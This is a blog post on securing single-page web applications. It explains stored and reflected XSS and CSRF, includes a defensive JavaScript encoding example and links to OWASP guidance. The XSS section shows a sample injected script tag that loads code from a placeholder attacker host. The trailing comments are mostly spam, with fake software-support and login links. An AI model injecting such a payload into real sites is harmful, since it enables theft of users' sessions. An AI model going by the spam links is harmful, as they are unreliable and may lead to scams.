Security Measures for Your Single Page Application

Building a secure application is always a puzzle for many of us. This is especially true when you need to secure a single page Java web application, where much of what happens runs in the browser, outside your control. This post discusses this problem along with some of the popular preventive measures available today for securing your single page web application.

What is Single Page Application?

In earlier days web browsers were not nearly as powerful as they are today. We used to build web applications by keeping most of the processing logic on the server, leaving the browser as a simple means to render the DOM returned by the server. Simple user actions such as clicking a button or scrolling the page were all handled on the server. Over time browsers became far richer in functionality, and we have witnessed JavaScript emerge as a powerful scripting language.

A single-page application (SPA) is a web application that interacts with the user by dynamically rewriting the current page rather than loading entire new pages from a server. In other words, a single page application makes use of modern browser capabilities and responds to user actions such as clicking a button or navigating to a new page according to the logic defined in the JavaScript running in the browser. Let us go ahead and take a look at some common security attacks and preventive measures for them.

Common Security Attacks

The security attacks discussed in this section are not unique to SPAs; they apply to any web application. However, SPAs are more exposed, as a major portion of the UI code runs in the browser, leaving all traces of user actions and server interactions in the browser on the end user's machine.

Cross site scripting (XSS)

Cross site scripting (XSS) is a very common attack that injects malicious script into a vulnerable web application. There are two categories of XSS attacks:

Stored or Persistent XSS

Stored or persistent XSS attacks happen when an application takes user input without validating its contents and saves it in the server database. Later, when a user navigates to a page that displays this input, the server retrieves the data from the database and embeds the content in the HTML DOM without proper HTML escaping.
For example, consider a page with a field that allows a user to add comments. If there is no proper validation for this field, a hacker may try adding an HTML script tag as the value of this field. This can link to a malicious JavaScript file on a server owned by the hacker, as shown here: <script src="http://some-server.com/malicious-script.js"></script>  The web app fails to reject such input and stores it as the value of the comment field. When the application displays this comment later, the browser parses the script tag that was added as the comment value just like any regular HTML tag. This malicious script can harm the user in many ways. For instance, the script can contain code that POSTs customer data such as the session cookie or an unsecured access token to a REST API owned by the hacker, who can use this information later to take over the user's account.

Reflective XSS

In the case of reflective XSS, the malicious script is injected by appending it to the URL. Let us take an example to get a clearer picture. Suppose a hacker is visiting a site, for example www.jobinesh.com. Next, the hacker may try appending an arbitrary parameter value to the URL; if the site echoes the parameter back as typed without properly escaping it, then the site may be vulnerable to a reflective XSS attack. Here is an example: https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

You can learn more about XSS here: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Here are some options to prevent XSS: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
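Both variants above share one root cause: untrusted text (a stored comment, a URL parameter) is placed into HTML without encoding. The following is an added example, not code from the original post; it shows a minimal HTML output encoder in the style the OWASP cheat sheet recommends, a vulnerable rendering function beside its hardened form, and the same rule applied to a reflected query parameter. The comment string and the URL are constructed sample inputs, and `renderCommentUnsafe`, `renderCommentSafe`, `renderSearchResults` and `appendCommentToDom` are names chosen for this illustration.

```javascript
// Added example (not from the original post): output encoding for untrusted text.
// The same encoder handles stored and reflected XSS: any value that came from a user
// or from the URL is encoded at the moment it enters HTML, so "<script>" stays literal text.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Encode the six characters that can change meaning inside an HTML text or attribute context.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed sample: the stored-XSS comment value described in the post.
const STORED_COMMENT = '<script src="http://some-server.com/malicious-script.js"></script>';

// Vulnerable rendering: the untrusted comment is concatenated straight into markup,
// so the browser will parse the stored script tag as real HTML.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Hardened rendering: identical layout, but the comment is encoded on output.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Reflected case: read a query parameter and echo it back only after encoding.
// Missing parameters become the empty string rather than "null".
function renderSearchResults(pageUrl) {
  const q = new URL(pageUrl).searchParams.get('q') ?? '';
  return '<p>Results for: ' + escapeHtml(q) + '</p>';
}

// Inside the SPA itself, prefer DOM APIs that never parse markup at all:
// textContent treats the whole value as text, unlike innerHTML.
// (Not exercised here because it needs a browser `document`.)
function appendCommentToDom(container, comment) {
  const el = document.createElement('div');
  el.className = 'comment';
  el.textContent = comment;
  container.appendChild(el);
  return el;
}

// Side-by-side demonstration with the constructed inputs.
function demo() {
  return {
    unsafe: renderCommentUnsafe(STORED_COMMENT),
    safe: renderCommentSafe(STORED_COMMENT),
    reflected: renderSearchResults('https://www.jobinesh.com/search?q=<b>hello</b>'),
  };
}
```

Note that encoding belongs at the output stage, in the context where the value is written; validating the comment on input is a useful extra layer but does not replace it, since the same stored value may be rendered in several places.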


Cross-Site Request Forgery (CSRF)

Cross site request forgery (CSRF) is an attack that rides on the current user's logged-in browser session (the browser attaches the session cookie to every request automatically) to make the browser execute unwanted actions in an application to which the user is logged in.

You can learn more about CSRF here: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
To learn about preventive measures, visit the following link: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet




Comments

  1. Nice journal terribly fascinating and helpful info on your website. Thanks for sharing the journal and this nice info that is certainly about to facilitate us. We will be updating this post with new information to our knowledge box.

    Cheapest dedicated

  2. Network Security is a considering fact in the world of information technology. Network Security Solution Providers played an important role in defending these kind of cyber attacks.

  3. Nice Blog Post, it's very informative regarding IELTS courses. keep sharing.....thanks

    IELTS Coaching Institute in Jaipur

  4. This comment has been removed by the author.

  5. I read your blog now share great information here. Web Designer

  6. Thanks for sharing this blog. i'm really impresses with this blog. it teaches me a lot.
    web design training programs
    php institute in chennai
    magento course in chennai

  7. The ethereumpro our website is one of the world's most prominent ethereum mining profitability calculator that is working for excavators wherever all through the world. It is an enrolled site having a brilliant working history in mining. Likewise, giving surprising associations to their customers. The decision highlight of this site is it enrolled. Additionally, check from a wide extent of accidents or fakes. Visit our site it is secure for this system.

  8. In present era where cyberattacks have become normal, this blog helped me in understanding Business Security Solutions Houstoncan avoid normal security flaws within a given network.


  9. I went through your blog its really interesting and holds an informative content. Thanks for uploading such a wonderful blog.
    python classes near Bellandur|python classes in Marathahalli
    selenium testing classes in Bangalore|selenium testing classes near Bellandur

  10. The registrations and auditions for the Bigg Boss 13 are going to start soon. The official list of contestants is not yet announced by the officials. That will be announced by the makers on the inaugural day which is 15 the of September. bigg boss 13 contestants name list with photo and details Though a few rumored names are coming up as the expected celebrity contestants of the year. They are Nia Sharma, Raghav Juyal, Punit Pathak, Divyanka Tripathi, Garima Chaurasia, Ridhima Pandit, Aditya Narayan, Jasmin Bhasin, Zain Imam, Bhuvan Bam, Chetna Pande, Krystle D’Souza, and Devoleena Bhattacharjee. This year too, the show will be back with a new theme and the star host, Salman Khan. Though the theme is not declared yet officially. Stay tuned with us to know more about the show Bigg Boss 13.

  11. The registrations and auditions for the Bigg Boss 13 are going to start soon. The official list of contestants is not yet announced by the officials. That will be announced by the makers on the inaugural day which is 15 the of September. bigg boss 13 contestants name list with photo Though a few rumored names are coming up as the expected celebrity contestants of the year. They are Nia Sharma, Raghav Juyal, Punit Pathak, Divyanka Tripathi, Garima Chaurasia, Ridhima Pandit, Aditya Narayan, Jasmin Bhasin, Zain Imam, Bhuvan Bam, Chetna Pande, Krystle D’Souza, and Devoleena Bhattacharjee. This year too, the show will be back with a new theme and the star host, Salman Khan. Though the theme is not declared yet officially. Stay tuned with us to know more about the show Bigg Boss 13.

  12. This comment has been removed by the author.

  13. The great information that you shared. It will help all of them. Thanks for posting. Keep maintain the updates
    PHP Development Companies in Chennai
    |
    PHP Development Company
    |
    PHP web development services
    |

  14. The article was up to the point and described the information very effectively. Thanks to blog author for wonderful and informative post.
    website designing Pakistan

  15. Nice blog, thanks for sharing with us this interesting blog. Visit OGEN Infosystem for Website Designing and PPC Services in Delhi, India.
    Web Development Company

  16. Now you can download office offline and online both. Office facilitates to activate it online.For that you have need of activation key and go to official site, login your account and enter valid key and activate it.Other wise you can install and then put key and activate offline also on your computer system successfully. If you get any of problem on your computer so contact to the support team .

    Bullguard Login
    Office Login
    Office Login
    Mcafee Login
    AVG Login
    Norton Login
    webroot login
    webroot.com/safe
    Turbotax Login

  17. TurboTax is the best Accounting Software to maintain your tax pay account. You use it growth your business for this reason, that its have a brilliant team who always available for customers support and satisfy with them their answer, so if you have any issue with Turbotax visit here TurboTax Support and get free.



    Dragon naturally speaking support
    HP Printer Offline
    Office.com/setup
    TurboTax Support
    Garmin Login
    Avg login

  18. Very interesting, good job and thanks for sharing such a good blog. your article is so convincing that I never stop myself to say something about it. You’re doing a great job. Keep it up

    aws Training in Bangalore
    python Training in Bangalore
    hadoop Training in Bangalore
    angular js Training in Bangalore
    bigdata analytics Training in Bangalore

  19. Financial sector has undergone drastic technological shifts in a comparatively short span of time. The shifts have been incorporated because of Growing Technology, Customer Demands, etc. Take a glance over some of the legacy Cross-platform App Development Company. These are so dynamic and efficient that it will cost you less time, more functionality, good output returns.

